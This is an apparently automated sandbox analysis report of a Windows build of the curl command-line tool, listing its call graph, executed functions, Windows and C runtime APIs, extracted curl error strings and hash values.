e08f0b 41073->41072 41075 e08f10 fclose 41073->41075 41077 e08f64 41074->41077 41078 e08f49 41074->41078 41075->41072 41076->41074 41077->41038 41142 e0245c 89 API calls 41078->41142 41080 e08f56 free 41080->41077 41080->41078 41081->41029 41082->41029 41083->41036 41084->41056 41086 e12147 calloc 41085->41086 41088 e121a3 41085->41088 41089 e12181 41086->41089 41088->41065 41089->41088 41092 e1d282 WSAStartup 41089->41092 41090->41068 41091->41067 41093 e1d325 41092->41093 41094 e1d2af 41092->41094 41096 e50ca6 _ValidateLocalCookies 5 API calls 41093->41096 41095 e1d31f WSACleanup 41094->41095 41097 e1d2bd 41094->41097 41095->41093 41098 e1d336 41096->41098 41107 e34e72 41097->41107 41098->41088 41103 e1d2f6 41105 e10b38 14 API calls 41103->41105 41104 e1d2d9 GetProcAddress 41104->41103 41106 e1d304 QueryPerformanceFrequency 41105->41106 41106->41093 41108 e34e7c 41107->41108 41114 e1d2c2 41107->41114 41109 e10b38 14 API calls 41108->41109 41110 e34e8a 41109->41110 41111 e1d33a 11 API calls 41110->41111 41112 e34ea1 41111->41112 41113 e34eaa GetProcAddress 41112->41113 41112->41114 41113->41114 41114->41093 41115 e1d33a GetModuleHandleA 41114->41115 41116 e1d35c GetProcAddress _mbspbrk 41115->41116 41117 e1d2d0 41115->41117 41118 e1d391 41116->41118 41119 e1d380 41116->41119 41117->41103 41117->41104 41122 e1d395 GetProcAddress 41118->41122 41123 e1d3bf GetSystemDirectoryA 41118->41123 41120 e1d384 LoadLibraryExA 41119->41120 41121 e1d388 LoadLibraryA 41119->41121 41120->41117 41121->41117 41122->41123 41124 e1d3a7 41122->41124 41123->41117 41125 e1d3d4 malloc 41123->41125 41124->41120 41129 e1d402 GetSystemDirectoryA 41125->41129 41132 e1d448 free 41125->41132 41131 e1d410 41129->41131 41129->41132 41131->41132 41133 e1d45d LoadLibraryA 41131->41133 41132->41117 41133->41132 41135 e121c9 41134->41135 41141 e08ef6 free 41134->41141 41136 e12207 FreeLibrary 41135->41136 41137 e1221c 41135->41137 41135->41141 41136->41137 41143 e34ed8 41137->41143 41140 e12227 WSACleanup 41140->41141 41141->41072 41141->41073 41142->41080 41144 e34ee1 FreeLibrary 41143->41144 41145 e12221 41143->41145 41144->41145 41145->41140 41145->41141 42002 e40390 24 API calls 42003 e0544b 21 API calls _ValidateLocalCookies 41858 e27d60 15 API calls _ValidateLocalCookies 41860 e36d60 32 API calls 41146 e0cd66 41149 e0c72b 41146->41149 41171 e1027a 41149->41171 41151 e0c74c _time64 41175 e16ba2 calloc 41151->41175 41154 e0c77b 41156 e0c98c 41321 e18b08 41156->41321 41162 e0c797 41162->41156 41163 e0c97a 41162->41163 41164 e0c9b1 _time64 41162->41164 41169 e0c8d9 _time64 41162->41169 41192 e1760d 41162->41192 41221 e18a2b 41162->41221 41233 e0e407 17 API calls 2 library calls 41162->41233 41234 e17276 108 API calls 41162->41234 41235 e1201d 14 API calls 41162->41235 41236 e09327 41162->41236 41319 e0920d free 41162->41319 41335 e0c5d3 73 API calls 41162->41335 41320 e0e407 17 API calls 2 library calls 41163->41320 41164->41162 41169->41162 41172 e102da GetTickCount 41171->41172 41173 e1028a QueryPerformanceCounter 41171->41173 41174 e102ac __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41172->41174 41173->41174 41174->41151 41176 e16bc3 calloc 41175->41176 41177 e16bd1 41176->41177 41185 e0c775 41176->41185 41336 e28f8c 60 API calls 41177->41336 41179 e16c0c 41180 e16c64 41179->41180 41337 e2e990 41179->41337 41342 e16aa3 41180->41342 41183 e16c47 WSACreateEvent 41183->41180 41183->41185 41185->41154 41191 e0c5d3 73 API calls 41185->41191 41188 e2d032 free 41190 e16c7f free 41188->41190 41190->41185 41191->41162 41193 e17668 41192->41193 41200 e17654 41192->41200 41194 e50ca6 _ValidateLocalCookies 5 API calls 41193->41194 41196 e1795f 41194->41196 41195 e176e1 41353 e191a5 7 API calls _ValidateLocalCookies 41195->41353 41196->41162 41199 e176f4 41201 e17743 41199->41201 41202 e17716 malloc 41199->41202 41200->41193 41200->41195 41352 e1752d 19 API calls 41200->41352 41203 e17866 WSAWaitForMultipleEvents 41201->41203 41214 e177d7 send 41201->41214 41215 e1780f WSAEventSelect 41201->41215 41217 e1784d 41201->41217 41354 e1752d 19 API calls 41201->41354 41207 e17735 41202->41207 41208 e1773c 41202->41208 41205 e1788c 41203->41205 41206 e1791f WSAResetEvent 41203->41206 41205->41206 41213 e178da WSAEnumNetworkEvents WSAEventSelect 41205->41213 41356 e1752d 19 API calls 41205->41356 41206->41193 41210 e17934 free 41206->41210 41207->41193 41208->41201 41210->41193 41213->41205 41214->41215 41215->41201 41216 e17894 41215->41216 41216->41205 41219 e178b1 free 41216->41219 41217->41203 41355 e2f35e 12 API calls 2 library calls 41217->41355 41219->41205 41220 e17860 41220->41203 41220->41205 41357 e3480b 41221->41357 41223 e50ca6 _ValidateLocalCookies 5 API calls 41224 e18b06 41223->41224 41224->41162 41227 e18a50 41230 e18a9f 41227->41230 41232 e18a77 41227->41232 41361 e17b97 41227->41361 41228 e18ade 41228->41232 41373 e1927c 7 API calls 41228->41373 41230->41228 41371 e2cc72 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41230->41371 41372 e18fae IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41230->41372 41232->41223 41233->41162 41234->41162 41235->41162 41237 e09354 41236->41237 41312 e09998 41236->41312 41238 e09371 _close 41237->41238 41239 e09383 41237->41239 41237->41312 41238->41239 41240 e0939c 41239->41240 41243 e093e1 41239->41243 41379 e12119 41240->41379 41241 e09423 41242 e094cc 41241->41242 41245 e0949f fflush 41241->41245 41248 e0975c 41242->41248 41256 e1027a 2 API calls 41242->41256 41289 e094f0 41242->41289 41244 e09409 41243->41244 41247 e0942b 41243->41247 41244->41241 41253 e12119 14 API calls 41244->41253 41245->41242 41249 e094ad 41245->41249 41247->41241 41252 e09446 _fileno 41247->41252 41257 e09451 41247->41257 41250 e0977d 41248->41250 41254 e0976d fputs 41248->41254 41249->41242 41261 e12119 14 API calls 41249->41261 41259 e09789 fclose 41250->41259 41265 e097e0 41250->41265 41252->41257 41253->41241 41254->41250 41255 e093c9 fputs 41255->41241 41256->41289 41257->41241 41260 e09483 41257->41260 41258 e09a7d 41266 e09a92 41258->41266 41462 e10637 32 API calls ___from_strstr_to_strchr 41258->41462 41262 e09797 41259->41262 41263 e097b6 41259->41263 41455 e01fdc 30 API calls 41260->41455 41261->41242 41262->41263 41262->41265 41274 e12119 14 API calls 41262->41274 41263->41265 41457 e0911d 20 API calls 41263->41457 41265->41258 41283 e09841 _strdup 41265->41283 41268 e09aae 41266->41268 41271 e09aa6 fclose 41266->41271 41267 e0948d 41267->41241 41272 e09ab7 free 41268->41272 41273 e09acb 41268->41273 41271->41268 41272->41273 41277 e09ae6 41273->41277 41279 e09ade fclose 41273->41279 41274->41263 41275 e09897 41459 e0913e 20 API calls 41275->41459 41276 e097d5 _unlink 41276->41265 41280 e09b03 41277->41280 41281 e09aef free 41277->41281 41279->41277 41282 e09b15 41280->41282 41382 e216ca 41280->41382 41281->41280 41285 e09b24 free free free 41282->41285 41286 e09b1b free 41282->41286 41287 e099d4 CreateFileA 41283->41287 41288 e0985d 41283->41288 41285->41312 41286->41285 41290 e099f3 free 41287->41290 41291 e099fb 41287->41291 41288->41287 41292 e0986d 41288->41292 41289->41248 41289->41275 41297 e1027a 2 API calls 41289->41297 41290->41291 41294 e09a60 GetLastError 41291->41294 41295 e09a01 41291->41295 41458 e0913e 20 API calls 41292->41458 41293 e098c3 41300 e09926 fflush _fileno _get_osfhandle _lseeki64 41293->41300 41305 e12119 14 API calls 41293->41305 41293->41312 41461 e0913e 20 API calls 41294->41461 41302 e09a1e SetFileTime 41295->41302 41318 e096f2 41297->41318 41298 e0987c 41298->41258 41303 e0988a free 41298->41303 41301 e0995f 41300->41301 41317 e09989 41300->41317 41306 e09965 SetEndOfFile 41301->41306 41301->41317 41307 e09a55 CloseHandle 41302->41307 41308 e09a38 GetLastError 41302->41308 41303->41258 41304 e09a7a 41304->41258 41309 e09920 41305->41309 41310 e09972 fseek 41306->41310 41306->41317 41307->41258 41460 e0913e 20 API calls 41308->41460 41309->41300 41310->41312 41310->41317 41312->41162 41313 e12119 14 API calls 41313->41312 41314 e09749 41456 e0913e 20 API calls 41314->41456 41315 e09a52 41315->41307 41317->41312 41317->41313 41318->41275 41318->41314 41319->41162 41320->41156 41322 e18b15 41321->41322 41323 e18b2a 41321->41323 41322->41323 41324 e18b83 41322->41324 41499 e16f2d 102 API calls _ValidateLocalCookies 41322->41499 41323->41154 41491 e295d1 41324->41491 41327 e16aa3 free 41329 e18b95 41327->41329 41330 e2d032 free 41329->41330 41331 e18ba0 41329->41331 41330->41331 41332 e2d032 free 41331->41332 41333 e18bbc WSACloseEvent 41332->41333 41334 e18bd7 free 41333->41334 41334->41323 41335->41162 41336->41179 41338 e2e994 41337->41338 41339 e2e99e socket 41337->41339 41338->41183 41340 e2e9b1 closesocket 41339->41340 41341 e2e9ba 41339->41341 41340->41341 41341->41183 41343 e16ab9 41342->41343 41344 e16acd 41343->41344 41346 e2d032 free 41343->41346 41345 e2d032 free 41344->41345 41347 e16ad4 41345->41347 41346->41343 41348 e2d032 41347->41348 41349 e16c74 41348->41349 41350 e2d03b 41348->41350 41349->41188 41349->41190 41351 e2d06b free 41350->41351 41351->41349 41352->41200 41353->41199 41354->41201 41355->41220 41356->41205 41358 e34873 GetTickCount 41357->41358 41359 e3481c QueryPerformanceCounter 41357->41359 41360 e3483e __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41358->41360 41359->41360 41360->41227 41362 e17bc8 41361->41362 41367 e189ca 41361->41367 41362->41367 41369 e17bf1 41362->41369 41374 e16f2d 102 API calls _ValidateLocalCookies 41362->41374 41364 e195e3 19 API calls 41364->41369 41367->41227 41369->41364 41369->41367 41375 e17961 102 API calls 41369->41375 41376 e29e52 18 API calls 41369->41376 41377 e22166 82 API calls 41369->41377 41378 e30211 20 API calls 41369->41378 41371->41230 41372->41230 41373->41232 41374->41369 41375->41369 41376->41369 41377->41369 41378->41369 41463 e11535 41379->41463 41383 e21ae5 41382->41383 41384 e216dc 41382->41384 41383->41282 41384->41383 41482 e1956a 17 API calls 41384->41482 41386 e216f1 41483 e17405 18 API calls 41386->41483 41388 e216f8 41389 e21706 41388->41389 41484 e17276 108 API calls 41388->41484 41391 e18b08 240 API calls 41389->41391 41393 e21712 41389->41393 41391->41393 41392 e21743 41485 e239d0 266 API calls 41392->41485 41393->41392 41395 e21740 free 41393->41395 41395->41392 41396 e2174a 41486 e274bc 17 API calls 41396->41486 41398 e21751 free 41400 e21782 free 41398->41400 41487 e27663 free free free 41400->41487 41402 e21792 free 41404 e217b7 free 41402->41404 41405 e217d4 41402->41405 41404->41405 41488 e215c6 21 API calls 41405->41488 41408 e217e1 free 41489 e1d126 free 41408->41489 41411 e21809 free 41490 e21251 101 API calls 41411->41490 41455->41267 41456->41248 41457->41276 41458->41298 41459->41293 41460->41315 41461->41304 41462->41266 41473 e10f87 41463->41473 41465 e1158f 41466 e50ca6 _ValidateLocalCookies 5 API calls 41465->41466 41467 e093bd 41466->41467 41467->41241 41467->41255 41468 e115d6 fputc 41468->41465 41470 e11589 __aulldvrm 41468->41470 41469 e11616 fputc 41469->41465 41469->41470 41470->41465 41470->41468 41470->41469 41471 e1201d 12 API calls 41470->41471 41481 e10e54 __stdio_common_vsprintf 41470->41481 41471->41470 41474 e10fa9 41473->41474 41477 e11430 41473->41477 41475 e10eda strncmp strncmp 41474->41475 41476 e11008 strncmp 41474->41476 41474->41477 41479 e1115a strtol 41474->41479 41480 e11122 strtol 41474->41480 41475->41474 41476->41474 41478 e11026 strncmp 41476->41478 41477->41470 41478->41474 41479->41474 41480->41474 41481->41470 41482->41386 41483->41388 41484->41389 41485->41396 41486->41398 41487->41402 41488->41408 41489->41411 41492 e2965a 41491->41492 41496 e295f2 41491->41496 41493 e50ca6 _ValidateLocalCookies 5 API calls 41492->41493 41494 e18b8d 41493->41494 41494->41327 41495 e29641 41497 e216ca 266 API calls 41495->41497 41496->41495 41500 e22166 82 API calls 41496->41500 41497->41492 41499->41322 41500->41496 42006 e12769 17 API calls 42007 e0336b 6 API calls 42009 e01f70 29 API calls 42011 e32f70 301 API calls 42014 e51370 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 42017 e0544b 20 API calls _ValidateLocalCookies 41866 e37140 27 API calls 41867 e47d40 21 API calls 41870 e1bd49 free free malloc 41871 e13d50 feof fclose 41872 e3a550 strtol 42022 e4c750 CryptGetHashParam CryptGetHashParam CryptDestroyHash CryptReleaseContext 41873 e0544b 43 API calls _ValidateLocalCookies 41619 e17b5d 41620 e17b8e 41619->41620 41621 e17b69 malloc 41619->41621 41621->41620 41874 e0544b 21 API calls _ValidateLocalCookies 42024 e10320 14 API calls __alldvrm 41877 e4bd2a 51 API calls _ValidateLocalCookies 40928 e0cf30 40956 e032d3 40928->40956 40931 e0cf54 calloc 40934 e0cf70 calloc 40931->40934 40932 e0cf45 40999 e09199 20 API calls 40932->40999 40936 e0cf7e 40934->40936 40935 e0ceee 40966 e1963b 40936->40966 40939 e1963b 133 API calls 40940 e0cfa8 40939->40940 40941 e1963b 133 API calls 40940->40941 40942 e0cfb4 40941->40942 40943 e1963b 133 API calls 40942->40943 40944 e0cfc0 40943->40944 40945 e1963b 133 API calls 40944->40945 40947 e0cfcc 40945->40947 40948 e0cfef 40947->40948 40985 e0da2f 40947->40985 41000 e1978f 268 API calls 40948->41000 40950 e0d00c 40950->40935 40951 e0d016 40950->40951 41001 e0343b 7 API calls 40951->41001 40953 e0d01b 41002 e03460 26 API calls 40953->41002 40955 e0d022 40955->40935 41003 e10dce 40956->41003 40959 e0330a 41012 e03279 free free free 40959->41012 40960 e032f4 malloc 40962 e03303 40960->40962 40963 e03319 40960->40963 41011 e10e10 free free 40962->41011 40964 e0330f 40963->40964 40964->40931 40964->40932 40967 e1964f 40966->40967 40980 e0cf9c 40966->40980 40968 e19673 40967->40968 40969 e196fd 40967->40969 40967->40980 40973 e196c2 40968->40973 40974 e196ec 40968->40974 40968->40980 40970 e19767 40969->40970 40971 e19706 40969->40971 40972 e1976c 40970->40972 40970->40980 40976 e19741 40971->40976 40977 e19710 40971->40977 40971->40980 41016 e20830 75 API calls 40972->41016 40973->40980 40983 e196e4 free 40973->40983 40974->40980 41014 e20e3f 11 API calls 40974->41014 40978 e19746 calloc 40976->40978 40976->40980 40977->40980 41015 e28f8c 60 API calls 40977->41015 40984 e1975d calloc 40978->40984 40980->40939 40981 e19778 40981->40980 40983->40980 40984->40980 40987 e0da96 40985->40987 40990 e0da54 40985->40990 40986 e0dac4 40988 e0dae7 40986->40988 40996 e0da9a 40986->40996 41021 e0d77a 25 API calls 2 library calls 40986->41021 40987->40986 40987->40996 41020 e0d77a 25 API calls 2 library calls 40987->41020 40992 e0daf5 _strdup 40988->40992 40988->40996 40997 e0da76 40990->40997 41017 e0d8d0 40990->41017 40994 e0db07 40992->40994 40992->40996 41022 e09199 20 API calls 40994->41022 40996->40947 40997->40987 40997->40996 40998 e0d8d0 2 API calls 40997->40998 40998->40987 40999->40935 41000->40950 41001->40953 41002->40955 41004 e10de1 41003->41004 41005 e10dea 41004->41005 41006 e032ea 41004->41006 41013 e10d8d malloc 41005->41013 41006->40959 41006->40960 41006->40964 41008 e10df3 41009 e10e0b 41008->41009 41010 e10e08 free 41008->41010 41009->41006 41010->41009 41011->40959 41012->40964 41013->41008 41014->40980 41015->40980 41016->40981 41018 e10dce 2 API calls 41017->41018 41019 e0d8da 41018->41019 41019->40997 41020->40986 41021->40988 41022->40996 41880 e0d136 16 API calls _strrchr 42028 e17bff 488 API calls 42029 e0af39 65 API calls _ValidateLocalCookies 42030 e0544b 26 API calls 2 library calls 42031 e01b00 33 API calls _ValidateLocalCookies 42032 e03b00 25 API calls 42033 e1aa59 105 API calls 41885 e09d02 29 API calls _ValidateLocalCookies 41886 e3c900 29 API calls 42034 e3db00 free free free free 41888 e0544b 84 API calls _ValidateLocalCookies 42035 e51309 _seh_filter_exe 41889 e17bff 310 API calls 42036 e01f10 _read 41890 e05480 8 API calls _ValidateLocalCookies 42037 e40710 37 API calls _ValidateLocalCookies 41893 e51110 17 API calls 2 library calls 42038 e50b10 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42039 e0544b 78 API calls _ValidateLocalCookies 42040 e5131d _c_exit _exit GetModuleHandleW 42041 e1831f 19 API calls

                                    Executed Functions

                                    Function 00E1D33A Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 129libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 352 e1d33a-e1d356 GetModuleHandleA 353 e1d35c-e1d37e GetProcAddress _mbspbrk 352->353 354 e1d47e-e1d481 352->354 355 e1d391-e1d393 353->355 356 e1d380-e1d382 353->356 359 e1d395-e1d3a5 GetProcAddress 355->359 360 e1d3bf-e1d3ce GetSystemDirectoryA 355->360 357 e1d384-e1d386 356->357 358 e1d388-e1d38f LoadLibraryA 356->358 361 e1d3ac-e1d3b6 LoadLibraryExA 357->361 362 e1d3b8-e1d3ba 358->362 359->360 363 e1d3a7 359->363 364 e1d3d4-e1d3d6 360->364 365 e1d47b-e1d47d 360->365 361->362 362->365 363->361 366 e1d3d9-e1d3de 364->366 365->354 366->366 368 e1d3e0-e1d400 malloc 366->368 370 e1d402-e1d40e GetSystemDirectoryA 368->370 371 e1d469-e1d47a free 368->371 370->371 372 e1d410-e1d412 370->372 371->365 374 e1d415-e1d41a 372->374 374->374 375 e1d41c-e1d427 374->375 376 e1d42a-e1d42f 375->376 376->376 377 e1d431-e1d435 376->377 378 e1d437-e1d43f 377->378 378->378 379 e1d441-e1d446 378->379 380 e1d448-e1d45b 379->380 381 e1d45d-e1d461 LoadLibraryA 379->381 382 e1d467 380->382 381->382 382->371
                                    APIs
                                    • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D34B
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D363
                                    • _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00E57348,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D374
                                    • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(security.dll,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D389
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00E34EA1,AddDllDirectory,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D39D
                                    • LoadLibraryExA.KERNELBASE(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3B6
                                    • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,00000000,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3C1
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3F6
                                    • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D406
                                    • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(00E34EA1,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D461
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
                                    • String ID: AddDllDirectory$LoadLibraryExA$kernel32$security.dll
                                    • API String ID: 184734234-2138446276
                                    • Opcode ID: df4280e80a2f9eac136e0b8c7529a786d8a5a5b16027ec5104d7c6bff1771f85
                                    • Instruction ID: 288c0f408cd4751d4e4337011e14513328dfc38127708fd639cc14ccc81da232
                                    • Opcode Fuzzy Hash: df4280e80a2f9eac136e0b8c7529a786d8a5a5b16027ec5104d7c6bff1771f85
                                    • Instruction Fuzzy Hash: B1418936A08B11EFCF195F25AC286EE3F74EF4575571441A8E802F7251CB315D4ACB90
                                    Function 00E11535 Relevance: 13.1, APIs: 3, Strings: 4, Instructions: 886COMMON
                                    Download Yara Rule
                                    APIs
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00E115D6
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00E11616
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputc
                                    • String ID: %ld$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 1992160199-2365385051
                                    • Opcode ID: 3d473e6040c00e6498dcc55698c5112ff01c814342b02d284089e7eb08097fcf
                                    • Instruction ID: c85b596a58992ce02a2b5b5c5d01e64461a885a7e899d7add45a74b5af415548
                                    • Opcode Fuzzy Hash: 3d473e6040c00e6498dcc55698c5112ff01c814342b02d284089e7eb08097fcf
                                    • Instruction Fuzzy Hash: C662D37120C7418FD718CE28D8847AABBE1EFC4358F245A5EF695A72D1DB70C885CB42
                                    Function 00E09327 Relevance: 75.9, APIs: 29, Strings: 14, Instructions: 651fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00E0D002,?,?,?,?,?,?,?,00E0CD94,00E0D002,?,?,?), ref: 00E09374
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo,00000002,?,?,00000000,00E0D002), ref: 00E093D4
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E09449
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E094A2
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E57668,?), ref: 00E09775
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E0978C
                                    • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000078,?,00000000,00E0D002), ref: 00E097DA
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000078,?,00000000,00E0D002), ref: 00E09843
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00E0D002), ref: 00E0988B
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E09927
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E0993A
                                    • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E09943
                                    • _lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000), ref: 00E09952
                                    • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00E0D002), ref: 00E09968
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000002,?,?,?,?,?,?,?,00000000,00E0D002), ref: 00E0997C
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E09AA7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09ABD
                                    Strings
                                    • The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 00E0974C
                                    • curl: (%d) Failed writing body, xrefs: 00E094BF, 00E097A9
                                    • Removing output file: %s, xrefs: 00E097CA
                                    • Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 00E098B3
                                    • curl: (%d) %s, xrefs: 00E093B0
                                    • Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 00E09A45
                                    • M', xrefs: 00E0956B
                                    • curl: (23) Failed seeking to end of file, xrefs: 00E09991
                                    • curl: (23) Failed to truncate file, xrefs: 00E099BD
                                    • Failed to set filetime %I64d on outfile: overflow, xrefs: 00E0986F
                                    • Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 00E09A6D
                                    • curl: (%d) The requested URL returned error: %ld, xrefs: 00E09416
                                    • Throwing away %I64d bytes, xrefs: 00E09913
                                    • More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 00E093CF
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _filenofclosefflushfputsfree$File_close_get_osfhandle_lseeki64_strdup_unlinkfseek
                                    • String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$M'$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
                                    • API String ID: 968532693-3733868149
                                    • Opcode ID: ebb8deadfbd7cd4370285619c86cc13285b779af4fc9e14c2a37e1d8014a4798
                                    • Instruction ID: d58c9d1fe3217ed01c360927f8cf8725d4daa6ca86d1476f9f322f9bcd0fa467
                                    • Opcode Fuzzy Hash: ebb8deadfbd7cd4370285619c86cc13285b779af4fc9e14c2a37e1d8014a4798
                                    • Instruction Fuzzy Hash: E232CB71A00305AFDB258FA4DC89BAEBBB5FF04309F146429E415B62E3D775AD94CB10
                                    Function 00E0DC15 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 418fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
